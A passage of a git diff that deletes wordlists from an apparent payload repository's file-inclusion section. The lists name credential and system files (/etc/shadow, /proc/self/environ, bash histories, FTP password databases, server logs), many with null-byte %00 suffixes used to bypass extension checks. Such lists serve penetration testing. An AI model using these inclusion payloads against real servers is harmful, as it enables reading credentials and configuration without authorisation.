-/private/etc/httpd/httpd.conf%00 -/private/etc/httpd/httpd.conf.default -/private/etc/httpd/httpd.conf.default -/private/etc/httpd/httpd.conf.default%00 -/proc/cmdline -/proc/self/cmdline -/proc/self/environ -/proc/self/fd/0 -/proc/self/fd/1 -/proc/self/fd/10 -/proc/self/fd/11 -/proc/self/fd/12 -/proc/self/fd/13 -/proc/self/fd/14 -/proc/self/fd/15 -/proc/self/fd/16 -/proc/self/fd/17 -/proc/self/fd/18 -/proc/self/fd/19 -/proc/self/fd/2 -/proc/self/fd/20 -/proc/self/fd/21 -/proc/self/fd/22 -/proc/self/fd/23 -/proc/self/fd/24 -/proc/self/fd/25 -/proc/self/fd/255 -/proc/self/fd/26 -/proc/self/fd/27 -/proc/self/fd/28 -/proc/self/fd/29 -/proc/self/fd/3 -/proc/self/fd/30 -/proc/self/fd/31 -/proc/self/fd/32 -/proc/self/fd/33 -/proc/self/fd/34 -/proc/self/fd/35/etc/passwd%00 -/proc/self/fd/4 -/proc/self/fd/5 -/proc/self/fd/6 -/proc/self/fd/7 -/proc/self/fd/8 -/proc/self/fd/9 -/proc/self/stat -/proc/self/status -/proc/version -/Program Files\Apache Group\Apache2\conf\httpd.conf -/Program Files\Apache Group\Apache2\conf\httpd.conf -\Program Files\Apache Group\Apache2\conf\httpd.conf -/Program Files\Apache Group\Apache2\conf\httpd.conf%00 -/Program Files\Apache Group\Apache\conf\httpd.conf -/Program Files\Apache Group\Apache\conf\httpd.conf -\Program Files\Apache Group\Apache\conf\httpd.conf -/Program Files\Apache Group\Apache\conf\httpd.conf%00 -/Program Files\Apache Group\Apache\logs\access.log -/Program Files\Apache Group\Apache\logs\access.log -\Program Files\Apache Group\Apache\logs\access.log -/Program Files\Apache Group\Apache\logs\access.log%00 -/Program Files\Apache Group\Apache\logs\error.log -/Program Files\Apache Group\Apache\logs\error.log -\Program Files\Apache Group\Apache\logs\error.log -/Program Files\Apache Group\Apache\logs\error.log%00 -/Program Files\xampp\apache\conf\httpd.conf -/Program Files\xampp\apache\conf\httpd.conf -/Program Files\xampp\apache\conf\httpd.conf%00 -\Program Files\xampp\apache\conf\httpd.confetc/passwd -/root/.bash_history -/tmp/sess_ -/usr/apache2/conf/httpd.conf -/usr/apache2/conf/httpd.conf -/usr/apache2/conf/httpd.conf%00 -/usr/apache/conf/httpd.conf -/usr/apache/conf/httpd.conf -/usr/apache/conf/httpd.conf%00 -/usr/etc/pure-ftpd.conf -/usr/etc/pure-ftpd.conf -/usr/etc/pure-ftpd.conf%00 -/usr/lib/php.ini -/usr/lib/php.ini -/usr/lib/php.ini%00 -/usr/lib/php/php.ini -/usr/lib/php/php.ini -/usr/lib/php/php.ini%00 -/usr/lib/security/mkuser.default -/usr/lib/security/mkuser.default -/usr/lib/security/mkuser.default%00 -/usr/local/apache2/conf/httpd.conf -/usr/local/apache2/conf/httpd.conf -/usr/local/apache2/conf/httpd.conf%00 -/usr/local/apache2/httpd.conf -/usr/local/apache2/httpd.conf -/usr/local/apache2/httpd.conf%00 -/usr/local/apache2/logs/access_log -/usr/local/apache2/logs/access_log -/usr/local/apache2/logs/access.log -/usr/local/apache2/logs/access.log -/usr/local/apache2/logs/access_log%00 -/usr/local/apache2/logs/access.log%00 -/usr/local/apache2/logs/error_log -/usr/local/apache2/logs/error_log -/usr/local/apache2/logs/error.log -/usr/local/apache2/logs/error.log -/usr/local/apache2/logs/error_log%00 -/usr/local/apache2/logs/error.log%00 -/usr/local/apache/conf/httpd.conf -/usr/local/apache/conf/httpd.conf -/usr/local/apache/conf/httpd.conf%00 -/usr/local/apache/conf/php.ini -/usr/local/apache/conf/php.ini -/usr/local/apache/conf/php.ini%00 -/usr/local/apache/httpd.conf -/usr/local/apache/httpd.conf -/usr/local/apache/httpd.conf%00 -/usr/local/apache/logs/access_log -/usr/local/apache/logs/access_log -/usr/local/apache/logs/access_log -/usr/local/apache/logs/access.log -/usr/local/apache/logs/access.log -/usr/local/apache/logs/access.log -/usr/local/apache/logs/access_ log%00 -/usr/local/apache/logs/access_log%00 -/usr/local/apache/logs/access. log%00 -/usr/local/apache/logs/access.log%00 -/usr/local/apache/logs/error_log -/usr/local/apache/logs/error_log -/usr/local/apache/logs/error_log -/usr/local/apache/logs/error.log -/usr/local/apache/logs/error.log -/usr/local/apache/logs/error.log -/usr/local/apache/logs/error_log%00 -/usr/local/apache/logs/error.log%00 -/usr/local/apps/apache2/conf/httpd.conf -/usr/local/apps/apache2/conf/httpd.conf -/usr/local/apps/apache2/conf/httpd.conf%00 -/usr/local/apps/apache/conf/httpd.conf -/usr/local/apps/apache/conf/httpd.conf -/usr/local/apps/apache/conf/httpd.conf%00 -/usr/local/cpanel/logs -/usr/local/cpanel/logs -/usr/local/cpanel/logs%00 -/usr/local/cpanel/logs/access_log -/usr/local/cpanel/logs/access_log -/usr/local/cpanel/logs/access_log%00 -/usr/local/cpanel/logs/error_log -/usr/local/cpanel/logs/error_log -/usr/local/cpanel/logs/error_log%00 -/usr/local/cpanel/logs/license_log -/usr/local/cpanel/logs/license_log -/usr/local/cpanel/logs/license_log%00 -/usr/local/cpanel/logs/login_log -/usr/local/cpanel/logs/login_log -/usr/local/cpanel/logs/login_log%00 -/usr/local/cpanel/logs/stats_log -/usr/local/cpanel/logs/stats_log -/usr/local/cpanel/logs/stats_log%00 -/usr/local/etc/apache2/conf/httpd.conf -/usr/local/etc/apache2/conf/httpd.conf -/usr/local/etc/apache2/conf/httpd.conf%00 -/usr/local/etc/apache/conf/httpd.conf -/usr/local/etc/apache/conf/httpd.conf -/usr/local/etc/apache/conf/httpd.conf%00 -/usr/local/etc/apache/vhosts.conf -/usr/local/etc/apache/vhosts.conf -/usr/local/etc/apache/vhosts.conf%00 -/usr/local/etc/httpd/conf/httpd.conf -/usr/local/etc/httpd/conf/httpd.conf -/usr/local/etc/httpd/conf/httpd.conf%00 -/usr/local/etc/php.ini -/usr/local/etc/php.ini -/usr/local/etc/php.ini%00 -/usr/local/etc/pure-ftpd.conf -/usr/local/etc/pure-ftpd.conf -/usr/local/etc/pure-ftpd.conf%00 -/usr/local/etc/pureftpd.pdb -/usr/local/etc/pureftpd.pdb -/usr/local/etc/pureftpd.pdb%00 -/usr/local/httpd/conf/httpd.conf -/usr/local/httpd/conf/httpd.conf -/usr/local/httpd/conf/httpd.conf%00 -/usr/local/lib/php.ini -/usr/local/lib/php.ini -/usr/local/lib/php.ini%00 -/usr/local/php4/httpd.conf -/usr/local/php4/httpd.conf -/usr/local/php4/httpd.conf%00 -/usr/local/php4/httpd.conf.php -/usr/local/php4/httpd.conf.php -/usr/local/php4/httpd.conf.php%00 -/usr/local/php4/lib/php.ini -/usr/local/php4/lib/php.ini -/usr/local/php4/lib/php.ini%00 -/usr/local/php5/httpd.conf -/usr/local/php5/httpd.conf -/usr/local/php5/httpd.conf%00 -/usr/local/php5/httpd.conf.php -/usr/local/php5/httpd.conf.php -/usr/local/php5/httpd.conf.php%00 -/usr/local/php5/lib/php.ini -/usr/local/php5/lib/php.ini -/usr/local/php5/lib/php.ini%00 -/usr/local/php/httpd.conf -/usr/local/php/httpd.conf -/usr/local/php/httpd.conf%00 -/usr/local/php/httpd.conf.php -/usr/local/php/httpd.conf.php -/usr/local/php/httpd.conf.php%00 -/usr/local/php/lib/php.ini -/usr/local/php/lib/php.ini -/usr/local/php/lib/php.ini%00 -/usr/local/pureftpd/etc/pure-ftpd.conf -/usr/local/pureftpd/etc/pure-ftpd.conf -/usr/local/pureftpd/etc/pure-ftpd.conf%00 -/usr/local/pureftpd/etc/pureftpd.pdb -/usr/local/pureftpd/etc/pureftpd.pdb -/usr/local/pureftpd/etc/pureftpd.pdb%00 -/usr/local/pureftpd/sbin/pure-config.pl -/usr/local/pureftpd/sbin/pure-config.pl -/usr/local/pureftpd/sbin/pure-config.pl%00 -/usr/local/Zend/etc/php.ini -/usr/local/Zend/etc/php.ini -/usr/local/Zend/etc/php.ini%00 -/usr/pkgsrc/net/pureftpd/ -/usr/pkgsrc/net/pureftpd/ -/usr/pkgsrc/net/pureftpd/%00 -/usr/ports/contrib/pure-ftpd/ -/usr/ports/contrib/pure-ftpd/ -/usr/ports/contrib/pure-ftpd/%00 -/usr/ports/ftp/pure-ftpd/ -/usr/ports/ftp/pure-ftpd/ -/usr/ports/ftp/pure-ftpd/%00 -/usr/ports/net/pure-ftpd/ -/usr/ports/net/pure-ftpd/ -/usr/ports/net/pure-ftpd/%00 -/usr/sbin/pure-config.pl -/usr/sbin/pure-config.pl -/usr/sbin/pure-config.pl%00 -/var/adm/lastlog -/var/adm/log/xferlog -/var/adm/log/xferlog -/var/adm/log/xferlog%00 -/var/adm/messages -/var/adm/messages.0 -/var/adm/messages.1 -/var/adm/messages.2 -/var/adm/messages.3 -/var/adm/utmpx -/var/adm/wtmpx -/var/cpanel/cpanel.config -/var/cpanel/cpanel.config -/var/cpanel/cpanel.config%00 -/var/db/shadow/hash -/var/lib/mysql/my.cnf -/var/lib/mysql/my.cnf -/var/lib/mysql/my.cnf%00 -/var/lib/php5/session/sess_ -/var/lib/php/session/sess_ -/var/local/www/conf/php.ini -/var/local/www/conf/php.ini -/var/local/www/conf/php.ini%00 -/var/log/access_log -/var/log/access_log -/var/log/access_log -/var/log/access.log -/var/log/access.log -/var/log/access.log -/var/log/access_log%00 -/var/log/access.log%00 -/var/log/apache2/access_log -/var/log/apache2/access_log -/var/log/apache2/access_log -/var/log/apache2/access.log -/var/log/apache2/access.log -/var/log/apache2/access_log%00 -/var/log/apache2/access.log%00 -/var/log/apache2/error_log -/var/log/apache2/error_log -/var/log/apache2/error.log -/var/log/apache2/error.log -/var/log/apache2/error.log -/var/log/apache2/error_log%00 -/var/log/apache2/error.log%00 -/var/log/apache/access_log -/var/log/apache/access_log -/var/log/apache/access_log -/var/log/apache/access.log -/var/log/apache/access.log -/var/log/apache/access_log%00 -/var/log/apache/access.log%00 -/var/log/apache/error_log -/var/log/apache/error_log -/var/log/apache/error.log -/var/log/apache/error.log -/var/log/apache/error.log -/var/log/apache/error_log%00 -/var/log/apache/error.log%00 -/var/log/authlog -/var/log/auth.log -/var/log/auth.log.0 -/var/log/auth.log.0.gz -/var/log/auth.log.1 -/var/log/auth.log.1.gz -/var/log/auth.log.2 -/var/log/auth.log.2.gz -/var/log/auth.log.3 -/var/log/auth.log.3.gz -/var/log/error_log -/var/log/error_log -/var/log/error.log -/var/log/error.log -/var/log/error_log%00 -/var/log/error.log%00 -/var/log/exim_mainlog -/var/log/exim_mainlog -/var/log/exim/mainlog -/var/log/exim/mainlog -/var/log/exim_mainlog%00 -/var/log/exim/mainlog%00 -/var/log/exim_paniclog -/var/log/exim_paniclog -/var/log/exim/paniclog -/var/log/exim/paniclog -/var/log/exim_paniclog%00 -/var/log/exim/paniclog%00 -/var/log/exim_rejectlog -/var/log/exim/rejectlog -/var/log/exim/rejectlog -/var/log/exim/rejectlog%00 -/var/log/exim_rejectlog%00/etc/issue -/var/log/exim_rejectlog/etc/passwd -/var/log/ftplog -/var/log/ftplog -/var/log/ftplog%00 -/var/log/ftp-proxy -/var/log/ftp-proxy -/var/log/ftp-proxy%00 -/var/log/ftp-proxy/ftp-proxy.log -/var/log/ftp-proxy/ftp-proxy.log -/var/log/ftp-proxy/ftp-proxy.log%00 -/var/log/httpd/access_log -/var/log/httpd/access_log -/var/log/httpd/access.log -/var/log/httpd/access_log%00 -/var/log/httpd/access.log%00 -/var/log/httpd/error_log -/var/log/httpd/error_log -/var/log/httpd/error.log -/var/log/httpd/error_log%00 -/var/log/httpd/error.log%00 -/var/log/kernel.log -/var/log/lastlog -/var/log/maillog -/var/log/mail.log -/var/log/maillog -/var/log/maillog%00 -/var/log/messages -/var/log/messages.0 -/var/log/messages.0.gz -/var/log/messages.1 -/var/log/messages.1.gz -/var/log/messages.2 -/var/log/messages.2.gz -/var/log/messages.3 -/var/log/messages.3.gz -/var/log/messages.log -/var/log/mysqlderror.log -/var/log/mysqlderror.log -/var/log/mysqlderror.log%00 -/var/log/mysql.log -/var/log/mysql.log -/var/log/mysql.log%00 -/var/log/mysql/mysql-bin.log -/var/log/mysql/mysql-bin.log -/var/log/mysql/mysql-bin.log%00 -/var/log/mysql/mysql.log -/var/log/mysql/mysql.log -/var/log/mysql/mysql.log%00 -/var/log/mysql/mysql-slow.log -/var/log/mysql/mysql-slow.log -/var/log/mysql/mysql-slow.log%00 -/var/log/nginx/access_log -/var/log/nginx/access_log -/var/log/nginx/access_log -/var/log/nginx/access.log -/var/log/nginx/access.log -/var/log/nginx/access_log%00 -/var/log/nginx/access.log%00 -/var/log/nginx/error_log -/var/log/nginx/error_log -/var/log/nginx/error.log -/var/log/nginx/error.log -/var/log/nginx/error.log -/var/log/nginx/error_log%00 -/var/log/nginx/error.log%00 -/var/log/proftpd -/var/log/proftpd -/var/log/proftpd%00 -/var/log/pureftpd.log -/var/log/pureftpd.log -/var/log/pureftpd.log%00 -/var/log/pure-ftpd/pure-ftpd.log -/var/log/pure-ftpd/pure-ftpd.log -/var/log/pure-ftpd/pure-ftpd.log%00 -/var/log/secure.log -/var/log/syslog -/var/log/syslog.0 -/var/log/syslog.0.gz -/var/log/syslog.1 -/var/log/syslog.1.gz -/var/log/syslog.2 -/var/log/syslog.2.gz -/var/log/syslog.3 -/var/log/syslog.3.gz -/var/log/syslog.log -/var/log/vsftpd.log -/var/log/vsftpd.log -/var/log/vsftpd.log%00 -/var/log/wtmp -/var/log/xferlog -/var/log/xferlog -/var/log/xferlog%00 -/var/mail/apache -/var/mail/nobody -/var/mail/www -/var/mail/www-data -/var/mysql.log -/var/mysql.log -/var/mysql.log%00 -/var/root/.bash_history -/var/root/.sh_history -/var/run/utmp -/var/www/.bash_history -/var/www/conf/httpd.conf -/var/www/conf/httpd.conf -/var/www/conf/httpd.conf%00 -/var/www/config.php -/var/www/logs/access_log -/var/www/logs/access_log -/var/www/logs/access_log -/var/www/logs/access.log -/var/www/logs/access.log -/var/www/logs/access_log%00 -/var/www/logs/access.log%00 -/var/www/logs/error_log -/var/www/logs/error_log -/var/www/logs/error_log -/var/www/logs/error.log -/var/www/logs/error.log -/var/www/logs/error.log -/var/www/logs/error_log%00 -/var/www/logs/error.log%00 -/var/www/mgr/logs/access_log -/var/www/mgr/logs/access.log -/var/www/mgr/logs/error_log -/var/www/mgr/logs/error.log -/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00 -/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00 -/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00 -/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00 -/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00 -/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00 -/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini -/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini -/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00 -/Volumes/webBackup/opt/apache2/conf/httpd.conf -/Volumes/webBackup/opt/apache2/conf/httpd.conf -/Volumes/webBackup/opt/apache2/conf/httpd.conf%00 -/Volumes/webBackup/private/etc/httpd/httpd.conf -/Volumes/webBackup/private/etc/httpd/httpd.conf -/Volumes/webBackup/private/etc/httpd/httpd.conf%00 -/Volumes/webBackup/private/etc/httpd/httpd.conf.default -/Volumes/webBackup/private/etc/httpd/httpd.conf.default -/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00 -/web/conf/php.ini -/web/conf/php.ini -/web/conf/php.ini%00 -/WINDOWS\php.ini -/WINDOWS\php.ini -/WINDOWS\php.ini%00 -/WINNT\php.ini -/WINNT\php.ini -/WINNT\php.ini%00 -/www/logs/proftpd.system.log -/www/logs/proftpd.system.log -/www/logs/proftpd.system.log%00 -/xampp\apache\bin\php.ini -/xampp\apache\bin\php.ini -/xampp\apache\bin\php.ini%00 -\xampp\apache\conf\httpd.conf -\xampp\apache\logs\access.log -\xampp\apache\logs\error.log -\xampp\FileZillaFTP\FileZilla Server.xml -\xampp\FileZillaFTP\Logs -\xampp\FileZillaFTP\Logs\access.log -\xampp\FileZillaFTP\Logs\error.log -\xampp\MercuryMail\LOGS\access.log -\xampp\MercuryMail\LOGS\error.log -\xampp\MercuryMail\mercury.ini -\xampp\mysql\data\mysql.err -\xampp\phpmyadmin\config.inc -\xampp\phpMyAdmin\config.inc -\xampp\phpmyadmin\config.inc.php -\xampp\phpMyAdmin\config.inc.php -\xampp\phpmyadmin\phpinfo.php -\xampp\phpMyAdmin\phpinfo.php -\xampp\php\php.ini -\xampp\sendmail\sendmail.ini -\xampp\sendmail\sendmail.log -\xampp\tomcat\conf\tomcat-users.xml -\xampp\tomcat\conf\web.xml -\xampp\webalizer\webalizer.conf -\xampp\webdav\webdav.txt diff --git a/File Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt b/File Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt deleted file mode 100644 index 4f764a8..0000000 --- a/File Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt +++ /dev/null @@ -1,319 +0,0 @@ -/etc/passwd%00 -/etc/passwd%00 -/etc/shadow%00 -/etc/group%00 -/etc/security/group%00 -/etc/security/passwd%00 -/etc/security/user%00 -/etc/security/environ%00 -/etc/security/limits%00 -/usr/lib/security/mkuser.default%00 -/apache/logs/access.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/etc/httpd/logs/acces_log%00 -/etc/httpd/logs/acces.log%00 -/etc/httpd/logs/error_log%00 -/etc/httpd/logs/error.log%00 -/var/www/logs/access_log%00 -/var/www/logs/access.log%00 -/usr/local/apache/logs/access_ log%00 -/usr/local/apache/logs/access. log%00 -/var/log/apache/access_log%00 -/var/log/apache2/access_log%00 -/var/log/apache/access.log%00 -/var/log/apache2/access.log%00 -/var/log/access_log%00 -/var/log/access.log%00 -/var/www/logs/error_log%00 -/var/www/logs/error.log%00 -/usr/local/apache/logs/error_log%00 -/usr/local/apache/logs/error.log%00 -/var/log/apache/error_log%00 -/var/log/apache2/error_log%00 -/var/log/apache/error.log%00 -/var/log/apache2/error.log%00 -/var/log/error_log%00 -/var/log/error.log%00 -/var/log/httpd/access_log%00 -/var/log/httpd/error_log%00 -/var/log/httpd/access_log%00 -/var/log/httpd/error_log%00 -/var/log/nginx/access_log%00 -/var/log/nginx/access.log%00 -/var/log/nginx/error_log%00 -/var/log/nginx/error.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/apache2/logs/error.log%00 -/apache2/logs/access.log%00 -/apache2/logs/error.log%00 -/apache2/logs/access.log%00 -/apache2/logs/error.log%00 -/apache2/logs/access.log%00 -/apache2/logs/error.log%00 -/apache2/logs/access.log%00 -/apache2/logs/error.log%00 -/apache2/logs/access.log%00 -/logs/error.log%00 -/logs/access.log%00 -/logs/error.log%00 -/logs/access.log%00 -/logs/error.log%00 -/logs/access.log%00 -/logs/error.log%00 -/logs/access.log%00 -/logs/error.log%00 -/logs/access.log%00 -/etc/httpd/logs/acces_log%00 -/etc/httpd/logs/acces.log%00 -/etc/httpd/logs/error_log%00 -/etc/httpd/logs/error.log%00 -/usr/local/apache/logs/access_log%00 -/usr/local/apache/logs/access.log%00 -/usr/local/apache/logs/error_log%00 -/usr/local/apache/logs/error.log%00 -/usr/local/apache2/logs/access_log%00 -/usr/local/apache2/logs/access.log%00 -/usr/local/apache2/logs/error_log%00 -/usr/local/apache2/logs/error.log%00 -/var/www/logs/access_log%00 -/var/www/logs/access.log%00 -/var/www/logs/error_log%00 -/var/www/logs/error.log%00 -/var/log/httpd/access_log%00 -/var/log/httpd/access.log%00 -/var/log/httpd/error_log%00 -/var/log/httpd/error.log%00 -/var/log/apache/access_log%00 -/var/log/apache/access.log%00 -/var/log/apache/error_log%00 -/var/log/apache/error.log%00 -/var/log/apache2/access_log%00 -/var/log/apache2/access.log%00 -/var/log/apache2/error_log%00 -/var/log/apache2/error.log%00 -/var/log/access_log%00 -/var/log/access.log%00 -/var/log/error_log%00 -/var/log/error.log%00 -/opt/lampp/logs/access_log%00 -/opt/lampp/logs/error_log%00 -/opt/xampp/logs/access_log%00 -/opt/xampp/logs/error_log%00 -/opt/lampp/logs/access.log%00 -/opt/lampp/logs/error.log%00 -/opt/xampp/logs/access.log%00 -/opt/xampp/logs/error.log%00 -/Program Files\Apache Group\Apache\logs\access.log%00 -/Program Files\Apache Group\Apache\logs\error.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/apache/logs/error.log%00 -/apache/logs/access.log%00 -/logs/error.log%00 -/logs/access.log%00 -/logs/error.log%00 -/logs/access.log%00 -/logs/error.log%00 -/logs/access.log%00 -/logs/error.log%00 -/logs/access.log%00 -/logs/error.log%00 -/logs/access.log%00 -/logs/error.log%00 -/logs/access.log%00 -/etc/httpd/logs/acces_log%00 -/etc/httpd/logs/acces.log%00 -/etc/httpd/logs/error_log%00 -/etc/httpd/logs/error.log%00 -/var/www/logs/access_log%00 -/var/www/logs/access.log%00 -/usr/local/apache/logs/access_log%00 -/usr/local/apache/logs/access.log%00 -/var/log/apache/access_log%00 -/var/log/apache/access.log%00 -/var/log/access_log%00 -/var/www/logs/error_log%00 -/var/www/logs/error.log%00 -/usr/local/apache/logs/error_log%00 -/usr/local/apache/logs/error.log%00 -/var/log/apache/error_log%00 -/var/log/apache/error.log%00 -/var/log/access_log%00 -/var/log/error_log%00 -/usr/local/apache/conf/httpd.conf%00 -/usr/local/apache2/conf/httpd.conf%00 -/etc/httpd/conf/httpd.conf%00 -/etc/apache/conf/httpd.conf%00 -/usr/local/etc/apache/conf/httpd.conf%00 -/etc/apache2/httpd.conf%00 -/usr/local/apache/conf/httpd.conf%00 -/usr/local/apache2/conf/httpd.conf%00 -/usr/local/apache/httpd.conf%00 -/usr/local/apache2/httpd.conf%00 -/usr/local/httpd/conf/httpd.conf%00 -/usr/local/etc/apache/conf/httpd.conf%00 -/usr/local/etc/apache2/conf/httpd.conf%00 -/usr/local/etc/httpd/conf/httpd.conf%00 -/usr/apache2/conf/httpd.conf%00 -/usr/apache/conf/httpd.conf%00 -/usr/local/apps/apache2/conf/httpd.conf%00 -/usr/local/apps/apache/conf/httpd.conf%00 -/etc/apache/conf/httpd.conf%00 -/etc/apache2/conf/httpd.conf%00 -/etc/httpd/conf/httpd.conf%00 -/etc/http/conf/httpd.conf%00 -/etc/apache2/httpd.conf%00 -/etc/httpd/httpd.conf%00 -/etc/http/httpd.conf%00 -/etc/httpd.conf%00 -/opt/apache/conf/httpd.conf%00 -/opt/apache2/conf/httpd.conf%00 -/var/www/conf/httpd.conf%00 -/private/etc/httpd/httpd.conf%00 -/private/etc/httpd/httpd.conf.default%00 -/Volumes/webBackup/opt/apache2/conf/httpd.conf%00 -/Volumes/webBackup/private/etc/httpd/httpd.conf%00 -/Volumes/webBackup/private/etc/httpd/httpd.conf.default%00 -/Program Files\Apache Group\Apache\conf\httpd.conf%00 -/Program Files\Apache Group\Apache2\conf\httpd.conf%00 -/Program Files\xampp\apache\conf\httpd.conf%00 -/usr/local/php/httpd.conf.php%00 -/usr/local/php4/httpd.conf.php%00 -/usr/local/php5/httpd.conf.php%00 -/usr/local/php/httpd.conf%00 -/usr/local/php4/httpd.conf%00 -/usr/local/php5/httpd.conf%00 -/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00 -/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00 -/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00 -/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00 -/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00 -/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00 -/usr/local/etc/apache/vhosts.conf%00 -/etc/php.ini%00 -/bin/php.ini%00 -/etc/httpd/php.ini%00 -/usr/lib/php.ini%00 -/usr/lib/php/php.ini%00 -/usr/local/etc/php.ini%00 -/usr/local/lib/php.ini%00 -/usr/local/php/lib/php.ini%00 -/usr/local/php4/lib/php.ini%00 -/usr/local/php5/lib/php.ini%00 -/usr/local/apache/conf/php.ini%00 -/etc/php4.4/fcgi/php.ini%00 -/etc/php4/apache/php.ini%00 -/etc/php4/apache2/php.ini%00 -/etc/php5/apache/php.ini%00 -/etc/php5/apache2/php.ini%00 -/etc/php/php.ini%00 -/etc/php/php4/php.ini%00 -/etc/php/apache/php.ini%00 -/etc/php/apache2/php.ini%00 -/web/conf/php.ini%00 -/usr/local/Zend/etc/php.ini%00 -/opt/xampp/etc/php.ini%00 -/var/local/www/conf/php.ini%00 -/etc/php/cgi/php.ini%00 -/etc/php4/cgi/php.ini%00 -/etc/php5/cgi/php.ini%00 -/php5\php.ini%00 -/php4\php.ini%00 -/php\php.ini%00 -/PHP\php.ini%00 -/WINDOWS\php.ini%00 -/WINNT\php.ini%00 -/apache\php\php.ini%00 -/xampp\apache\bin\php.ini%00 -/NetServer\bin\stable\apache\php.ini%00 -/home2\bin\stable\apache\php.ini%00 -/home\bin\stable\apache\php.ini%00 -/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00 -/usr/local/cpanel/logs%00 -/usr/local/cpanel/logs/stats_log%00 -/usr/local/cpanel/logs/access_log%00 -/usr/local/cpanel/logs/error_log%00 -/usr/local/cpanel/logs/license_log%00 -/usr/local/cpanel/logs/login_log%00 -/usr/local/cpanel/logs/stats_log%00 -/var/cpanel/cpanel.config%00 -/var/log/mysql/mysql-bin.log%00 -/var/log/mysql.log%00 -/var/log/mysqlderror.log%00 -/var/log/mysql/mysql.log%00 -/var/log/mysql/mysql-slow.log%00 -/var/mysql.log%00 -/var/lib/mysql/my.cnf%00 -/etc/mysql/my.cnf%00 -/etc/my.cnf%00 -/etc/logrotate.d/proftpd%00 -/www/logs/proftpd.system.log%00 -/var/log/proftpd%00 -/etc/proftp.conf%00 -/etc/protpd/proftpd.conf%00 -/etc/vhcs2/proftpd/proftpd.conf%00 -/etc/proftpd/modules.conf%00 -/var/log/vsftpd.log%00 -/etc/vsftpd.chroot_list%00 -/etc/logrotate.d/vsftpd.log%00 -/etc/vsftpd/vsftpd.conf%00 -/etc/vsftpd.conf%00 -/etc/chrootUsers%00 -/var/log/xferlog%00 -/var/adm/log/xferlog%00 -/etc/wu-ftpd/ftpaccess%00 -/etc/wu-ftpd/ftphosts%00 -/etc/wu-ftpd/ftpusers%00 -/usr/sbin/pure-config.pl%00 -/usr/etc/pure-ftpd.conf%00 -/etc/pure-ftpd/pure-ftpd.conf%00 -/usr/local/etc/pure-ftpd.conf%00 -/usr/local/etc/pureftpd.pdb%00 -/usr/local/pureftpd/etc/pureftpd.pdb%00 -/usr/local/pureftpd/sbin/pure-config.pl%00 -/usr/local/pureftpd/etc/pure-ftpd.conf%00 -/etc/pure-ftpd.conf%00 -/etc/pure-ftpd/pure-ftpd.pdb%00 -/etc/pureftpd.pdb%00 -/etc/pureftpd.passwd%00 -/etc/pure-ftpd/pureftpd.pdb%00 -/usr/ports/ftp/pure-ftpd/%00 -/usr/ports/net/pure-ftpd/%00 -/usr/pkgsrc/net/pureftpd/%00 -/usr/ports/contrib/pure-ftpd/%00 -/var/log/pure-ftpd/pure-ftpd.log%00 -/logs/pure-ftpd.log%00 -/var/log/pureftpd.log%00 -/var/log/ftp-proxy/ftp-proxy.log%00 -/var/log/ftp-proxy%00 -/var/log/ftplog%00 -/etc/logrotate.d/ftp%00 -/etc/ftpchroot%00 -/etc/ftphosts%00 -/var/log/exim_mainlog%00 -/var/log/exim/mainlog%00 -/var/log/maillog%00 -/var/log/exim_paniclog%00 -/var/log/exim/paniclog%00 -/var/log/exim/rejectlog%00 -/var/log/exim_rejectlog%00 \ No newline at end of file diff --git a/File Inclusion/Intruders/Mac-files.txt b/File Inclusion/Intruders/Mac-files.txt deleted file mode 100644 index 99fdad9..0000000 --- a/File Inclusion/Intruders/Mac-files.txt +++ /dev/null @@ -1,8 +0,0 @@ -/etc/apache2/httpd.conf -/Library/WebServer/Documents/index.html -/private/var/log/appstore.log -/var/log/apache2/error_log -/var/log/apache2/access_log -/usr/local/nginx/conf/nginx.conf -/var/log/nginx/error_log -/var/log/nginx/access_log \ No newline at end of file diff --git a/File Inclusion/Intruders/Traversal.txt b/File Inclusion/Intruders/Traversal.txt deleted file mode 100644 index 1c9b883..0000000 --- a/File Inclusion/Intruders/Traversal.txt +++ /dev/null @@ -1,4521 